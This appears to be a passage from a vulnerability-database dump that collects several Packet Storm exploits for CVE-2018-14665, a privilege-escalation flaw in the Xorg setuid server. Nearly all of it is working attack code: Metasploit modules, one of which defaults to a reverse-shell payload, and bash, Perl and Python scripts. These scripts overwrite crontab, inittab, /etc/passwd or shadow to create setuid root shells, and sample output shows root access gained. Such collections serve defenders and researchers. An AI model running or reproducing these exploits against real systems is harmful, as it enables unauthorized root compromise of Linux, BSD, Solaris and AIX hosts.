\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Narendra Shinde', # Discovery and exploit \n'Aaron Ringo', # Metasploit module \n], \n'DisclosureDate' => 'Oct 25 2018', \n'References' => \n[ \n[ 'CVE', '2018-14665' ], \n[ 'BID', '105741' ], \n[ 'EDB', '45697' ], \n[ 'EDB', '45742' ], \n[ 'EDB', '45832' ], \n[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ] \n], \n'Platform' => %w[linux unix solaris], \n'Arch' => [ARCH_X86, ARCH_X64], \n'SessionTypes' => %w[shell meterpreter], \n'Targets' => \n[ \n['Linux x64', { \n'Platform' => 'linux', \n'Arch' => ARCH_X64 } ], \n['Linux x86', { \n'Platform' => 'linux', \n'Arch' => ARCH_X86 } ], \n['Solaris x86', { \n'Platform' => [ 'solaris', 'unix' ], \n'Arch' => ARCH_SPARC } ], \n['Solaris x64', { \n'Platform' => [ 'solaris', 'unix' ], \n'Arch' => ARCH_SPARC } ], \n], \n'DefaultTarget' => 0)) \n \nregister_advanced_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \nOptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), \nOptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]), \nOptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ]) \n] \n) \nend \n \n \ndef check \n# linux checks \nuname = cmd_exec \"uname\" \nif uname =~ /linux/i \nvprint_status \"Running additional check for Linux\" \nif datastore['ConsoleLock'] \nuser = cmd_exec \"id -un\" \nunless exist? \"/var/run/console/#{user}\" \nvprint_error \"No console lock for #{user}\" \nreturn CheckCode::Safe \nend \nvprint_good \"Console lock for #{user}\" \nend \nend \n \n# suid program check \nxorg_path = cmd_exec \"command -v Xorg\" \nunless xorg_path.include?(\"Xorg\") \nvprint_error \"Could not find Xorg executable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg path found at #{xorg_path}\" \nunless setuid? 
xorg_path \nvprint_error \"Xorg binary #{xorg_path} is not SUID\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg binary #{xorg_path} is SUID\" \n \nx_version = cmd_exec \"Xorg -version\" \nif x_version.include?(\"Release Date\") \nv = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first) \nunless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2')) \nvprint_error \"Xorg version #{v} not supported\" \nreturn CheckCode::Safe \nend \nelsif x_version.include?(\"Fatal server error\") \nvprint_error \"User probably does not have console auth\" \nvprint_error \"Below is Xorg -version output\" \nvprint_error x_version \nreturn CheckCode::Safe \nelse \nvprint_warning \"Could not parse Xorg -version output\" \nreturn CheckCode::Appears \nend \nvprint_good \"Xorg version #{v} is vulnerable\" \n \n# process check for /X \nproc_list = cmd_exec \"ps ax\" \nif proc_list.include?('/X ') \nvprint_warning('Xorg in process list') \nreturn CheckCode::Appears \nend \nvprint_good('Xorg does not appear to be running') \nreturn CheckCode::Vulnerable \nend \n \ndef check_arch_and_compile(path, data) \ncpu = '' \nif target['Arch'] == ARCH_X86 \ncpu = Metasm::Ia32.new \ncompile_with_metasm(cpu, path, data) \nelsif target['Arch'] == ARCH_SPARC \ncompile_with_gcc(path, data) \nelse \ncpu = Metasm::X86_64.new \ncompile_with_metasm(cpu, path, data) \nend \nend \n \ndef compile_with_metasm(cpu, path, data) \nshared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib) \nwrite_file(path, shared_obj) \nregister_file_for_cleanup path \n \nchmod path \nrescue \nprint_status('Failed to compile with Metasm. Falling back to compiling with GCC.') \ncompile_with_gcc(path, data) \nend \n \ndef compile_with_gcc(path, data) \nunless has_gcc? 
\nfail_with Failure::BadConfig, 'gcc is not installed' \nend \nvprint_good 'gcc is installed' \n \nsrc_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c\" \nwrite_file(src_path, data) \n \ngcc_cmd = \"gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \nregister_file_for_cleanup src_path \nregister_file_for_cleanup path \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{src_path} failed to compile\" \nend \n \nchmod path \nend \n \ndef exploit \ncheck_status = check \nif check_status == CheckCode::Appears \nprint_warning 'Could not get version or Xorg process possibly running, may fail' \nelsif check_status == CheckCode::Safe \nfail_with Failure::NotVulnerable, 'Target not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'This session already has root privileges' \nend \n \nunless writable? datastore['WritableDir'] \nfail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\" \nend \n \nprint_good 'Passed all initial checks for exploit' \n \nmodulepath = datastore['WritableDir'] \nsofile = \"#{modulepath}/#{datastore['sofile']}\" \npscript = \"#{modulepath}/.session-#{rand_text_alphanumeric 5..10}\" \nxdisplay = datastore['Xdisplay'] \n \nstub = %Q^ \nextern int setuid(int); \nextern int setgid(int); \nextern int system(const char *__s); \n \nvoid _init(void) __attribute__((constructor)); \n \nvoid __attribute__((constructor)) _init() { \nsetgid(0); \nsetuid(0); \nsystem(\"#{pscript} &\"); \n} \n^ \nprint_status 'Writing launcher and compiling' \ncheck_arch_and_compile(sofile, stub) \n \n# Uploading \nprint_status 'Uploading your payload, this could take a while' \nif payload.arch.first == 'cmd' \nwrite_file(pscript, payload.encoded) \nelse \nwrite_file(pscript, generate_payload_exe) \nend \nchmod pscript \nregister_file_for_cleanup pscript \n \n \n# Actual 
exploit with cron overwrite \nprint_status 'Exploiting' \n#Xorg -logfile derp -modulepath ',/tmp' :1 \nxorg_cmd = \"Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null\" \ncmd_exec xorg_cmd \nRex.sleep 7 \ncmd_exec \"pkill Xorg\" \nRex.sleep 1 \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/154942/xorg_x11_suid_server_modulepath.rb.txt"}, {"lastseen": "2018-10-26T18:18:35", "description": "", "published": "2018-10-25T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "PACKETSTORM:149958", "href": "https://packetstormsecurity.com/files/149958/xorg-x11-server-Local-Root.html", "sourceData": "`#!/bin/bash \n# x0rg - Xorg Local Root Exploit \n# Released under the Snitches Get Stitches Public Licence. \n# props to prdelka / fantastic for the shadow vector. \n# Gr33tz to everyone in #lizardhq and elsewhere <3 \n# ~infodox (25/10/2018) \n# FREE LAURI LOVE! 
\necho \"x0rg\" \necho \"[+] First, we create our shell and library...\" \ncat << EOF > /tmp/libhax.c \n#include <stdio.h> \n#include <sys/types.h> \n#include <unistd.h> \n__attribute__ ((__constructor__)) \nvoid dropshell(void){ \nchown(\"/tmp/rootshell\", 0, 0); \nchmod(\"/tmp/rootshell\", 04755); \nunlink(\"/etc/ld.so.preload\"); \nprintf(\"[+] done!\\n\"); \n} \nEOF \ngcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c \nrm -f /tmp/libhax.c \ncat << EOF > /tmp/rootshell.c \n#include <stdio.h> \nint main(void){ \nsetuid(0); \nsetgid(0); \nseteuid(0); \nsetegid(0); \nexecvp(\"/bin/sh\", NULL, NULL); \n} \nEOF \ngcc -o /tmp/rootshell /tmp/rootshell.c \nrm -f /tmp/rootshell.c \necho \"[+] Hack the planet!\" \ncd /etc; Xorg -fp \"/tmp/libhax.so\" -logfile ld.so.preload :1; \nmount # arbritary setuid we run to pop root \necho \"[+] Tidy up a bit...\" \nrm -f /tmp/libhax.so \necho \"[<3] :PPpPpPpOpr000000t!\" \n/tmp/rootshell \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149958/xorgx11local-exec.txt"}, {"lastseen": "2019-01-15T11:05:51", "description": "", "published": "2019-01-14T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "PACKETSTORM:151136", "href": "https://packetstormsecurity.com/files/151136/xorg-x11-server-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/sh \n \n# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab) \n# Date: 2018-11-25 \n# Exploit Author: Marco Ivaldi \n# Vendor Homepage: https://www.x.org/ \n# Version: xorg-x11-server 1.19.0 - 1.20.2 \n# Tested on: Oracle Solaris 11.4 \n# CVE : CVE-2018-14665 \n \n# \n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab \n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in xorg-x11-server before 1.20.3. 
An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665). \n# \n# \"In video games, this is what they call respawning\" -- Nick Sax \n# \n# This exploit targets /etc/inittab in order to escalate privileges to root \n# on Solaris 11 (no need to be connected to a physical console). Messing with \n# inittab is considerably dangerous and you may trash your system, however the \n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \n# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING! \n# \n# See also: \n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm \n# \n# Usage: \n# raptor@stalker:~$ chmod +x raptor_solgasm \n# raptor@stalker:~$ ./raptor_solgasm \n# [...] \n# Now please be patient for a few minutes... \n# [...] 
\n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab \n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab \n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old \n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned \n# root@stalker:/etc# id \n# uid=0(root) gid=0(root) \n# \n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): \n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] \n# Oracle Solaris 11 SPARC [untested] \n# \n \necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\" \necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\" \n \n# prepare the payload \ncat << EOF > /tmp/solgasm \ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c \ngcc /tmp/pwned.c -o /tmp/pwned \nchmod 4777 /tmp/pwned \nEOF \nchmod +x /tmp/solgasm \n \n# trigger the bug \nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1) \ncd /etc \nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 & \nsleep 5 \npkill Xorg \n \n# run the setuid shell \necho \necho \"Now please be patient for a few minutes...\" \necho \nuntil [ -u /tmp/pwned ]; do sleep 1; done \necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\" \nls -l /etc/inittab* \nls -l /tmp/pwned \nsleep 1 \n/tmp/pwned \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151136/xorgx11-escalate.txt"}, {"lastseen": "2018-12-06T10:32:23", "description": "", "published": "2018-12-05T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server (AIX) Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-12-05T00:00:00", "id": "PACKETSTORM:150620", "href": "https://packetstormsecurity.com/files/150620/Xorg-X11-Server-AIX-Local-Privilege-Escalation.html", "sourceData": "`# Exploit Title: AIX 
Xorg X11 Server - Local Privilege Escalation \n# Date: 29/11/2018 \n# Exploit Author: @0xdono \n# Original Discovery and Exploit: Narendra Shinde \n# Vendor Homepage: https://www.x.org/ \n# Platform: AIX \n# Version: X Window System Version 7.1.1 \n# Fileset: X11.base.rte < 7.1.5.32 \n# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable) \n# CVE: CVE-2018-14665 \n# \n# Explanation: \n# Incorrect command-line parameter validation in the Xorg X server can \n# lead to privilege elevation and/or arbitrary files overwrite, when the \n# X server is running with elevated privileges. \n# The -logfile argument can be used to overwrite arbitrary files in the \n# file system, due to incorrect checks in the parsing of the option. \n# \n# This is a port of the OpenBSD X11 Xorg exploit to run on AIX. \n# It overwrites /etc/passwd in order to create a new user with root privileges. \n# All currently logged in users need to be included when /etc/passwd is overwritten, \n# else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user. \n# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, \n# and is replaced by '-config'. \n# ksh93 is used for ANSI-C quoting, and is installed by default on AIX. \n# \n# IBM has not yet released a patch as of 29/11/2018. \n# \n# See also: \n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html \n# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html \n# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl \n# \n# Usage: \n# $ oslevel -s \n# 7100-04-00-0000 \n# $ Xorg -version \n# \n# X Window System Version 7.1.1 \n# Release Date: 12 May 2006 \n# X Protocol Version 11, Revision 0, Release 7.1.1 \n# Build Operating System: AIX IBM \n# Current Operating System: AIX sovma470 1 7 00C3C6F54C00 \n# Build Date: 07 July 2006 \n# Before reporting problems, check http://wiki.x.org \n# to make sure that you have the latest version. 
\n# Module Loader present \n# $ id \n# uid=16500(nmyo) gid=1(staff) \n# $ perl aixxorg.pl \n# [+] AIX X11 server local root exploit \n# [-] Checking for Xorg and ksh93 \n# [-] Opening /etc/passwd \n# [-] Retrieving currently logged in users \n# [-] Generating Xorg command \n# [-] Opening /tmp/wow.ksh \n# [-] Writing Xorg command to /tmp/wow.ksh \n# [-] Backing up /etc/passwd to /tmp/passwd.backup \n# [-] Making /tmp/wow.ksh executable \n# [-] Executing /tmp/wow.ksh \n# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n# [-] Done \n# [+] 'su wow' for root shell \n# $ su wow \n# # id \n# uid=0(root) gid=0(system) \n# # whoami \n# root \n \n#!/usr/bin/perl \nprint \"[+] AIX X11 server local root exploit\\n\"; \n \n# Check Xorg is in path \nprint \"[-] Checking for Xorg and ksh93 \\n\"; \nchomp($xorg = `command -v Xorg`); \nif ($xorg eq \"\"){ \nprint \"[X] Can't find Xorg binary, try hardcode it? exiting... \\n\"; \nexit; \n} \n \n# Check ksh93 is in path \nchomp($ksh = `command -v ksh93`); \nif ($ksh eq \"\"){ \nprint \"[X] Can't find ksh93 binary, try hardcode it? exiting... \\n\"; \nexit; \n} \n \n# Read in /etc/passwd \nprint \"[-] Opening /etc/passwd \\n\"; \nopen($passwd_fh, '<', \"/etc/passwd\"); \nchomp(@passwd_array = <$passwd_fh>); \nclose($passwd_fh); \n \n# Retrieve currently logged in users \nprint \"[-] Retrieving currently logged in users \\n\"; \n@users = `who | cut -d' ' -f1 | sort | uniq`; \nchomp(@users); \n \n# For all logged in users, add their current passwd entry to string \n# that will be used to overwrite passwd \n$users_logged_in_passwd = ''; \nforeach my $user (@users) \n{ \n$user .= \":\"; \nforeach my $line (@passwd_array) \n{ \nif (index($line, $user) == 0) { \n$users_logged_in_passwd = $users_logged_in_passwd . '\\n' . $line; 
\n} \n} \n} \n \n# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log \nprint \"[-] Generating Xorg command \\n\"; \n$blob = '-config ' . '$\\'' . $users_logged_in_passwd . '\\nwow::0:0::/:/usr/bin/ksh\\n#' . '\\''; \n \nprint \"[-] Opening /tmp/wow.ksh \\n\"; \nopen($fr, '>', \"/tmp/wow.ksh\"); \n \n# Use ksh93 for ANSI-C quoting \nprint \"[-] Writing Xorg command to /tmp/wow.ksh \\n\"; \nprint $fr '#!' . \"$ksh\\n\"; \nprint $fr \"$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \\n\"; \nclose $fr; \n \n# Backup passwd \nprint \"[-] Backing up /etc/passwd to /tmp/passwd.backup \\n\"; \nsystem(\"cp /etc/passwd /tmp/passwd.backup\"); \n \n# Make script executable and run it \nprint \"[-] Making /tmp/wow.ksh executable \\n\"; \nsystem(\"chmod +x /tmp/wow.ksh\"); \nprint \"[-] Executing /tmp/wow.ksh \\n\"; \nsystem(\"/tmp/wow.ksh\"); \n \n# Replace overwritten passwd with: original passwd + wow user \nprint \"[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \\n\"; \n$result = `su wow \"-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd\" && rm /tmp/wow.ksh`; \n \nprint \"[-] Done \\n\"; \nprint \"[+] 'su wow' for root shell \\n\"; \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150620/xorgx11aix-escalate.txt"}, {"lastseen": "2018-10-26T18:18:35", "description": "", "published": "2018-10-25T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "PACKETSTORM:149957", "href": "https://packetstormsecurity.com/files/149957/xorg-x11-server-Local-Privilege-Escalation.html", "sourceData": "`#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet \n \ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su \n \nOverwrite shadow (or 
any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected. \n \n \n \n \n \n#!/bin/sh \n# local privilege escalation in X11 currently \n# unpatched in OpenBSD 6.4 stable - exploit \n# uses cve-2018-14665 to overwrite files as root. \n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid \n# and vulnerable in default OpenBSD. \n# \n# - https://hacker.house \necho [+] OpenBSD 6.4-stable local root exploit \ncd /etc \nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 & \nsleep 5 \npkill Xorg \necho [-] dont forget to mv and chmod /etc/master.passwd.old back \necho [+] type 'Password1' and hit enter for root \nsu - \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149957/xorgx11-exec.txt"}, {"lastseen": "2018-10-31T10:17:28", "description": "", "published": "2018-10-31T00:00:00", "type": "packetstorm", "title": "xorg-x11-server 1.20.3 Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-31T00:00:00", "id": "PACKETSTORM:150042", "href": "https://packetstormsecurity.com/files/150042/xorg-x11-server-1.20.3-Privilege-Escalation.html", "sourceData": "`# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation \n# Date: 2018-10-27 \n# Exploit Author: Marco Ivaldi \n# Vendor Homepage: https://www.x.org/ \n# Version: xorg-x11-server 1.19.0 - 1.20.2 \n# Tested on: OpenBSD 6.3 and 6.4 \n# CVE : CVE-2018-14665 \n \n# raptor_xorgasm \n \n#!/bin/sh \n \n# \n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron \n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. 
X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665). \n# \n# This exploit targets OpenBSD's cron in order to escalate privileges to \n# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical \n# console, it works perfectly on pseudo-terminals connected via SSH as well. \n# \n# See also: \n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html \n# https://www.exploit-db.com/exploits/45697/ \n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850 \n# \n# Usage: \n# blobfish$ chmod +x raptor_xorgasm \n# blobfish$ ./raptor_xorgasm \n# [...] \n# Be patient for a couple of minutes... \n# [...] \n# Don't forget to cleanup and run crontab -e to reload the crontab. \n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab \n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned \n# blobfish# id \n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) \n# \n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): \n# OpenBSD 6.4 (Xorg 1.19.6) [tested] \n# OpenBSD 6.3 (Xorg 1.19.6) [tested] \n# \n \necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\" \necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\" \n \n# prepare the payload \ncat << EOF > /tmp/xorgasm \ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c \ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid \nchmod 4777 /usr/local/bin/pwned \nEOF \nchmod +x /tmp/xorgasm \n \n# trigger the bug \ncd /etc \nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 & \nsleep 5 \npkill Xorg \n \n# run the setuid shell \necho \necho \"Be patient for a couple of minutes...\" \necho \nsleep 120 \necho \necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\" \nls 
-l /etc/crontab* \nls -l /usr/local/bin/pwned \n/usr/local/bin/pwned \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150042/x111203-escalate.txt"}, {"lastseen": "2018-11-14T02:15:02", "description": "", "published": "2018-11-13T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-13T00:00:00", "id": "PACKETSTORM:150295", "href": "https://packetstormsecurity.com/files/150295/xorg-x11-server-Local-Privilege-Escalation.html", "sourceData": "`# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7) \n# Date: 2018-11-07 \n# Exploit Author: @bolonobolo \n# Vendor Homepage: https://www.x.org/ \n# Version: 1.19.5 \n# Tested on: RHEL 7.3 && 7.5 \n# CVE : CVE-2018-14665 \n# Explanation \n# The only condition that has to be met for this PE to work via SSH is that the legitimate non-root user \n# has to be logged in through the console at the moment the PE script is launched. \n# In fact, during the logged in session of the legitimate non-root user, \n# a file with the name of the non-root user will be created in the /var/run/console folder. \n# With that file present, the same non-root user can launch a Xorg command via SSH. \n# \n# Usage: $ python poc.py \n# $ python poc.py \n# [*] Waiting for bolo to connect to the console \n# [*] OK --> bolo console opened \n# [*] Building root shell wait 2 minutes \n# [*] crontab overwritten \n# \n# ... cut Xorg output ... \n# \n# [*] Xorg killed \n# (II) Server terminated successfully (0). Closing log file. 
\n# [*] Don't forget to cleanup /etc/crontab and /tmp dir \n# sh-4.2# id && whoami \n# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo) \n# root \n# sh-4.2# \n \n \n#!/usr/bin/python \nimport os \nimport getpass \nimport subprocess \n \nuserList = [] \npath=\"/var/run/console/\" \n \ndef getWhoami(): \nreturn getpass.getuser() \n \ndef getConsole(path): \np = subprocess.Popen([\"ls\", path], stdout=subprocess.PIPE) \n(console, err) = p.communicate() \nconsoleList = str.splitlines(console) \nreturn consoleList \n \ndef payload(): \nf = open(\"/tmp/payload\", \"w\") \npayload = (\"cp /bin/sh /usr/local/bin/shell\\n\" \n\"echo \\\"#include <stdio.h> \\\" > /tmp/shell.c\\n\" \n\"echo \\\"#include <stdlib.h>\\\" >> /tmp/shell.c\\n\" \n\"echo \\\"#include <sys/types.h>\\\" >> /tmp/shell.c\\n\" \n\"echo \\\"#include <unistd.h>\\\" >> /tmp/shell.c\\n\" \n\"echo 'int main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}' >> /tmp/shell.c\\n\" \n\"gcc /tmp/shell.c -o /usr/local/bin/shell\\n\" \n\"chmod 4777 /usr/local/bin/shell\\n\") \nf.write(payload) \n \ndef executePayload(): \nos.system(\"chmod +x /tmp/payload\") \nos.system(\"cd /etc; Xorg -fp \\\"* * * * * root /tmp/payload\\\" -logfile crontab :1 &\") \nprint \"[*] crontab overwritten\" \nos.system(\"sleep 5\") \nos.system(\"pkill Xorg\") \nprint \"[*] Xorg killed\" \nos.system(\"sleep 120\") \nreturn \n \ndef main(): \nwhoami = getWhoami() \nprint \"[*] Waiting for \" + whoami + \" to connect to the console\" \ni = 0 \nwhile (i == 0): \nconsoleList = getConsole(path) \nfor user in consoleList: \nif user == whoami : \nprint \"[*] OK --> \" + user + \" console opened\" \ni = 1 \nprint \"[*] Building root shell wait 2 minutes\" \npayload() \nexecutePayload() \nprint \"[*] Don't forget to cleanup /etc/crontab and /tmp dir\" \nos.system(\"/usr/local/bin/shell\") \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/150295/xorgx11server-escalate.txt"}, {"lastseen": "2018-11-26T10:22:16", "description": "", "published": "2018-11-25T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server SUID Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-25T00:00:00", "id": "PACKETSTORM:150450", "href": "https://packetstormsecurity.com/files/150450/Xorg-X11-Server-SUID-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::Kernel \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Xorg X11 Server SUID privilege escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges with SUID Xorg X11 server \nversions 1.19.0 < 1.20.3. \n \nA permission check flaw exists for -modulepath and -logfile options when \nstarting Xorg. This allows unprivileged users that can start the server \nthe ability to elevate privileges and run arbitrary code under root \nprivileges. \n \nThis module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). \nCentOS default install will require console auth for the user's session. \nCron launches the payload, so if Selinux is enforcing, exploitation \nmay still be possible, but the module will bail. \nXorg must have SUID permissions and may not start if running. \n \nOn exploitation a crontab.old backup file will be created by Xorg. \nThis module will remove the .old file and restore crontab after \nsuccessful exploitation. Failed exploitation may result in a corrupted \ncrontab. 
On successful exploitation artifacts will be created consistent \nwith starting Xorg and running a cron. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Narendra Shinde', # Discovery and exploit \n'Raptor - 0xdea', # Modified exploit for cron \n'Aaron Ringo', # Metasploit module \n'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module \n], \n'DisclosureDate' => 'Oct 25 2018', \n'References' => \n[ \n[ 'CVE', '2018-14665' ], \n[ 'BID', '105741' ], \n[ 'EDB', '45697' ], \n[ 'EDB', '45742' ], \n[ 'EDB', '45832' ], \n[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ], \n[ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ] \n], \n'Platform' => %w[openbsd linux], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'SessionTypes' => %w[shell meterpreter], \n'Targets' => \n[ \n['OpenBSD', { \n'Platform' => 'unix', \n'Arch' => [ ARCH_CMD ] } ], \n['Linux x64', { \n'Platform' => 'linux', \n'Arch' => [ ARCH_X64 ] } ], \n['Linux x86', { \n'Platform' => 'linux', \n'Arch' => [ ARCH_X86 ] } ] \n], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'cmd/unix/reverse_openssl', \n'WfsDelay' => 120 \n}, \n'DefaultTarget' => 0)) \n \nregister_advanced_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \nOptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), \nOptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]) \n] \n) \nend \n \n \ndef check \n \n# linux checks \nuname = cmd_exec \"uname\" \nif uname =~ /linux/i \nvprint_status \"Running additional check for Linux\" \nif datastore['ConsoleLock'] \nuser = cmd_exec \"id -un\" \nunless exist? \"/var/run/console/#{user}\" \nvprint_error \"No console lock for #{user}\" \nreturn CheckCode::Safe \nend \nvprint_good \"Console lock for #{user}\" \nend \nif selinux_installed? \nif selinux_enforcing? 
